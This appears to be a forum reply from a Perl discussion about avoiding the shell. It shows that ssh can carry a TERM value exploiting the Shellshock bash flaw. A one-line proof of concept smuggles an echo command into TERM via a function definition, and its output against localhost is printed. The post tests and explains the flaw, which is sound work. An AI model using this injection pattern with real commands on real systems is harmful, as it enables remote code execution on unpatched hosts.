Re^3: The importance of avoiding the shell

I think ssh can specify the value for TERM, making ssh an attack vector if you can get it to execute sh/bash.

Right; simple test:

qwurx [shmem] ~ > env TERM='() { :;}; echo vulnerable' ssh localhost
...
Last login: Tue Sep 30 10:14:54 2014 from localhost
vulnerable
qwurx [shmem] ~ >
[download]

perl -le'print map{pack c,($-++?1:13)+ord}split//,ESEL'

Comment on Re^3: The importance of avoiding the shell Download Code